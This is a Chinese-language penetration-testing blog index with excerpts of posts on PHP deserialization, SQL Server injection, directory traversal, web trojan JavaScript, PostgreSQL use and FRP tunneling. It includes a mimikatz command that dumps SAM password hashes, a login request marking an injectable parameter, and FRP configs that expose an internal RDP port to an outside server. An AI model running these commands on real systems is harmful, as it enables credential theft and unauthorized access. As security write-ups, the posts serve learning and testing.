PHP 反序列化

2021-07-08 [Pentest](反序列化)

0x01 php 中的魔法函数

__construct()：PHP 中类的构造函数，创建对象时调用。具有构造函数的类会在每次创建新对象时先调用此方法，所以非常适合在使用对象之前做一些初始化工作。

more...

通过 Sphinx 快速查询数据

2021-06-10 [Pentest](tools,社工)

0x00 Sphinx

Sphinx 是一款基于 SQL 的高性能全文检索引擎，Sphinx 的性能在众多全文检索引擎中也是数一数二的，利用 Sphinx我们可以完成比数据库本身更专业的搜索功能，而且可以有很多针对性的性能优化。

more...

获取 NTLM Hash

2020-12-08 [Pentest](intranet)

0x01 通过 sam 文件获取

通过 mimikatz 转储 sam 文件得到 hash(cmd 需要管理员权限)

mimikatz.exe log "privilege::debug" "token::elevate" "lsadump::sam" exit

通过 reg save 导出 sam 文件(2003 之后可以使用)(导 hiv 文件 cmd 需要管理员权限)
more...

记一次 SQLServer 注入

2020-06-22 [Pentest](SQL注入,bypass)

0x00 存在 SQL 注入

总之是遇到一个站，登录的页面，数据包大致如下：

POST /jsweb/userlogin/UserLoginAction.aspx HTTP/1.1
Host: 115.xxx.xxx.xxx:8042
Content-Length: 47
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://115.xxx.xxx.xxx:8042
Referer: http://115.xxx.xxx.xxx:8042/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=bxdzehxa5mvoco1fkrjlbqbt
Connection: close

uname=admin*&pwd=dskfsdkf&valCode=1197&telphone=

其中验证码可以绕过，而登录名那里存在注入

more...

目录遍历利用

2019-12-16 [Pentest](目录遍历)

0x00 目录遍历

一个同事说有一些目录遍历，想着能不能搞个脚本啥的，以后利用也方便，自己没有写出来，说让我看看

一般来说存在目录遍历的话就是翻文件，看看有没有一些敏感信息、未授权接口之类的，一个个翻的话也确实比较麻烦

more...

PostgreSQL 简单使用

2019-08-23 [Database](postgre)

0x00 安装

➜  brew install postgresql
➜  echo 'export PATH="/usr/local/Cellar/postgresql/11.4/bin:$PATH"' >> ~/.zshrc
➜  source ~/.zshrc
-- 初始化数据库
➜  initdb /usr/local/var/postgres
➜  pg_ctl -D /usr/local/var/postgres -l /usr/local/var/log/postgres.log start

0x01 简单操作

常用操作命令

reber=# \password #设置当前登录用户的密码
reber=# \password [user_name] #设置其他用户的密码
reber=# \l #列出所有数据库
reber=# \du #列出所有用户
reber=# \c [database_name] #连接数据库
reber=# \d #列出当前数据库的所有表
reber=# \d [table_name] #列出表结构
reber=# \conninfo #列出当前数据库和连接的信息

连接数据库

➜  psql postgres #初始化数据库后会生成默认的数据库 postgres
psql (11.4)
Type "help" for help.

postgres=# \l #查看当前数据库情况
                              List of databases
   Name    | Owner | Encoding |   Collate   |    Ctype    | Access privileges
-----------+-------+----------+-------------+-------------+-------------------
 postgres  | reber | UTF8     | zh_CN.UTF-8 | zh_CN.UTF-8 |
 template0 | reber | UTF8     | zh_CN.UTF-8 | zh_CN.UTF-8 | =c/reber         +
           |       |          |             |             | reber=CTc/reber
 template1 | reber | UTF8     | zh_CN.UTF-8 | zh_CN.UTF-8 | =c/reber         +
           |       |          |             |             | reber=CTc/reber
(4 rows)

postgres=# \du #查看当前用户
                                   List of roles
 Role name |                         Attributes                         | Member of
-----------+------------------------------------------------------------+-----------
 reber     | Superuser, Create role, Create DB, Replication, Bypass RLS | {}

postgres=# \c
You are now connected to database "postgres" as user "reber".
postgres=# \password
Enter new password:
Enter it again:
postgres-# \q

修改配置文件改端口

vim /usr/local/var/postgres/postgresql.conf

more...

记一次网页 js 挂马

2019-08-19 [Pentest](js)

0x00 常见网页挂马方式

iframe 框架挂马
简单来说就是加 iframe 标签
script 挂马
通过各种办法加载 js 代码
htm 文件挂马上传 htm 文件，然后用 script 引入
js 挂马上传 js 文件，然后用 script 引入
图片伪装挂马比较新颖的一种挂马隐蔽方法
等等。。。

0x01 发现被插入恶意 js

前几天在做子域名搜集，搜集完后提取 title，结果看到了一个站点的 title 不正常

more...

FRP 内网穿透

2019-07-30 [Pentest](intranet,端口转发)

0x00 对外提供简单的文件访问服务

服务端

➜  frp cat frps.ini
[common]
; 监听端口
bind_port = 7000

; 那些端口允许客户端用来映射
allow_ports = 22-80,3000,33389

➜  frp ./frps -c frps.ini
2019/07/31 00:22:31 [I] [service.go:139] frps tcp listen on 0.0.0.0:7000
2019/07/31 00:22:31 [I] [root.go:204] Start frps success

客户端

C:\Users\Administrator\Desktop\frp>type frpc.ini
[common]
server_addr = 66.123.35.123
server_port = 7000

[test_static_file]
type = tcp
; 文件服务的端口
remote_port = 3000

; 启用插件
plugin = static_file
; 要对外暴露的文件目录
plugin_local_path = C:\\Users\Administrator\Desktop\frp_file
; 访问 url 中会被去除的前缀，保留的内容即为要访问的文件路径
plugin_strip_prefix = myfile

; 301 认证
plugin_http_user = admin
plugin_http_passwd = 123456

C:\Users\Administrator\Desktop\frp>frpc.exe -c frpc.ini
2019/07/31 00:36:05 [I] [service.go:221] login to server success, get run id [c8
aef41d5862b79f], server udp port [0]
2019/07/31 00:36:05 [I] [proxy_manager.go:137] [c8aef41d5862b79f] proxy added: [
test_static_file]
2019/07/31 00:36:05 [I] [control.go:144] [test_static_file] start proxy success

访问
浏览器直接访问 http://66.123.35.123:3000/myfile/ 即可访问到 frp_file 中的文件

0x01 使用 frp 进行内网 3389 端口转发并加密压缩

服务端

➜  frp cat frps.ini
[common]
bind_port = 7000
➜  frp ./frps -c frps.ini
2019/07/30 23:31:31 [I] [service.go:139] frps tcp listen on 0.0.0.0:7000
2019/07/30 23:31:31 [I] [root.go:204] Start frps success

客户端

C:\Users\Administrator\Desktop\frp>type frpc.ini
[common]
server_addr = 66.123.35.123
server_port = 7000

[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 33389

; 加密压缩
use_encryption = true
use_compression = true

C:\Users\Administrator\Desktop\frp>frpc.exe -c frpc.ini
2019/07/30 23:32:38 [I] [service.go:221] login to server success, get run id [ce
144f7511f63353], server udp port [0]
2019/07/30 23:32:38 [I] [proxy_manager.go:137] [ce144f7511f63353] proxy added: [
rdp]
2019/07/30 23:32:38 [I] [control.go:144] [rdp] start proxy success

这里其实可以把 frp 做成服务，开机自启动的那种

more...